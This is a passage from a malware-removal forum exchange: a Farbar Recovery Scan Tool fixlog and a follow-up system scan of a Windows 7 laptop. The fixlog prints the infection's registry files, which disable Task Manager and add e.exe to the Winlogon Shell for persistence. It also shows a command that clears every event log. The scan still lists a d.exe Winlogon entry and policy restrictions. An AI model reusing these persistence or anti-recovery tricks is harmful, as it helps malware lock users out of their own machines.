if %ERRORLEVEL% EQU 1 start %windir%\fr.exe
goto e
::
========= End of CMD: =========
 
 
========= type C:\Windows\mgr_n.reg =========
 
Windows Registry Editor Version 5.00
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
========= End of CMD: =========
 
 
========= type  C:\Windows\mgr_f.reg =========
 
Windows Registry Editor Version 5.00
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
========= End of CMD: =========
 
 
========= type  C:\Windows\e.reg =========
 
Windows Registry Editor Version 5.00
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,e.exe"
========= End of CMD: =========
 
VirusTotal: C:\Windows\e.exe => https://www.virustot...sis/1569748171/
VirusTotal: C:\Windows\d.exe => https://www.virustot...sis/1573881239/
VirusTotal: C:\Windows\fr.exe => https://www.virustot...sis/1571079306/
C:\Windows\e.bat => moved successfully
C:\Windows\e.exe => moved successfully
C:\Windows\fr.exe => moved successfully
C:\Windows\Wget => moved successfully
C:\Windows\curl => moved successfully
C:\Windows\d.exe => moved successfully
C:\Windows\d.bat => moved successfully
C:\Windows\y.txt => moved successfully
C:\Windows\mgr_n.reg => moved successfully
C:\Windows\mgr_f.reg => moved successfully
C:\Windows\e.reg => moved successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => removed successfully
HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\IObitUnstaler => removed successfully
HKLM\Software\Classes\CLSID\{836AB26C-2DE4-41D3-AC24-4C6C2699B960} => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\IObitUnstaler => removed successfully
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\IObitUnstaler => removed successfully
 
========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========
 
 
========= End of CMD: =========
 
 
 
The system needed a reboot.
 
==== End of Fixlog 01:42:12 ====
 
 
Copy of FRST.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (19-11-2019 01:52:02)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Mixbyte Inc -> ) C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
(Opera Software AS -> Opera Software) C:\Program Files (x86)\Opera\64.0.3417.92\opera_autoupdate.exe
(Opera Software AS -> Opera Software) C:\Program Files (x86)\Opera\launcher.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(RealNetworks, Inc. -> RealNetworks, Inc.) C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {5131D822-F872-406C-8CEE-0DD5F2503DE1} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8C89DC2A-A626-4A37-9C20-27E3EAD3A4E5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {D781353E-F7F2-4393-9283-0F8A0A1C52E5} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {EF68E912-4810-45BB-A8DF-394E2CB49789} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
